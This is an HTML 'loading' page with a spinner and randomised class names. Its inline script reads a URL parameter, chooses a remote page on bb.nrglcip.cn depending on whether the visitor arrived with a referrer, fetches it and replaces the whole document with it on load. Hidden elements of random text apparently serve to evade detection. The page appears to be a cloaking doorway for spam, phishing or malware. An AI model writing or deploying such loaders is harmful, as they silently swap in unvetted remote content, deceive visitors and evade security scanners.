<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PiQmuAVKXu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PiQmuAVKXu .yUmjwk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PiQmuAVKXu .content {
            line-height: 50px;
            text-align: center
        }

        .PiQmuAVKXu .img {
            width: 100%
        }

        .PiQmuAVKXu .gzHqptMUofk {
            text-align: center
        }

        .PiQmuAVKXu .gzHqptMUofk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PiQmuAVKXu .gzHqptMUofk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PiQmuAVKXu .gzHqptMUofk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PiQmuAVKXu .gzHqptMUofk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PiQmuAVKXu .gzHqptMUofk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PiQmuAVKXu .gzHqptMUofk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PiQmuAVKXu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vDbIaC7yN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var z3E9l = vDbIaC7yN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ z3E9l +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ z3E9l +".html?a=share";
		}
		
        D6Fnb4paL=url+"#"+new Date().getTime();
        D6Fnb4paL && function() {
            $.get(D6Fnb4paL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >usy1KlBe3CrQJt0b50K</h1>
<li style='display:none' >aBwQdolTWFqjly9qSppaQGcfxshWuCvr4EK7zVEDdUrKGesGkUEkuxxwdiwsHkp8ta2mEn3lqsI</li>
<ul style='display:none' >jdQcsfeQPLdgBAF0VOKWyJlTuLY6zCIS0Ztjf4RA</ul>
<span style='display:none'>lRxoq3RJFf5JiRqXuqBF2OVUyXAwAu2e6PBCduy5cKbyzwsN0S90P1</span>
<div style='display:none'>r0zev0emrUBEVaoT5vVxYnHsNOZiVHfDwTSZmJYX5NUvvpXNqALrjNr3COldxN</div>
<ul style='display:none' >jdQcsfeQPLdgBAF0VOKWyJlTuLY6zCIS0Ztjf4RA</ul>
<div style='display:none'>r0zev0emrUBEVaoT5vVxYnHsNOZiVHfDwTSZmJYX5NUvvpXNqALrjNr3COldxN</div>
<h1 style='display:none' >usy1KlBe3CrQJt0b50K</h1>
<a  href='#' style='display:none'>n5beiUHIbq0EFHHlEcCJhqbElIi4NT6lZgautLCTHN1BHPfBbRZ</a><div class="PiQmuAVKXu">
    <div class="yUmjwk">
        <div class="gzHqptMUofk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >K3sgM3gAAkJrG9zbmqw7Qh6bpFx</b>
<b style='display:none' >K3sgM3gAAkJrG9zbmqw7Qh6bpFx</b>
<div style='display:none'>ILbRSJq5r8irWfdlYX7XVl9PVOfLo341Z01aP7pxgWhUgJgipfXhamEvtygHSt60HHL6ptjJEDHjHoxn</div></body>
</html>